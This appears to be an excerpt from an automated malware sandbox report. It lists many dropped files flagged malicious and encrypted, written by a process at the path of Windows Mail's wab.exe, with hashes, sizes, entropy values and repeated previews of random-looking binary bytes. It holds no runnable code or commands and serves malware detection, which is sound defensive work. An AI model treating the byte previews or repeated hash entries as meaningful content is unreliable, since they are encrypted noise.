                                                                                          SHA-512:88BC12E71A149777CB06F101C931E1BE27191F4A1DE9689171F896E4E0013E54189909434918808744E14CA8C4DF89F645014604B698056EBEA8715B45BD3125
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185526
                                                                                          Entropy (8bit):7.998992370994253
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxM:YzytbGOX6A16mtpmGvFdVT6LELSRDqcM
                                                                                          MD5:166EFAA99A67A659BD8E78C45B543235
                                                                                          SHA1:7C20D445270D78BA8BA30DBF542AB25ADB987B83
                                                                                          SHA-256:32363758888BC95073F99516D02E1AEE55A09E3261AD060B2688681DEEF1CADA
                                                                                          SHA-512:88BC12E71A149777CB06F101C931E1BE27191F4A1DE9689171F896E4E0013E54189909434918808744E14CA8C4DF89F645014604B698056EBEA8715B45BD3125
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):193368
                                                                                          Entropy (8bit):7.99909450421486
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMZyUzNADLQBCQQ+ofc2+25K4k2sZKgmXw3uFwMAQfMABjjo7Y8:LURqd+McXDdDZuFwi5Bjjo77
                                                                                          MD5:DB2D3EB11861F25E3965CF95D4615A40
                                                                                          SHA1:AE4B20FDDB1751A27DA0215022BC498D4364519B
                                                                                          SHA-256:59C430D63B7A2026A92AFCE32D765D9583A7F10D6D749106D2FA7246CFA9DC56
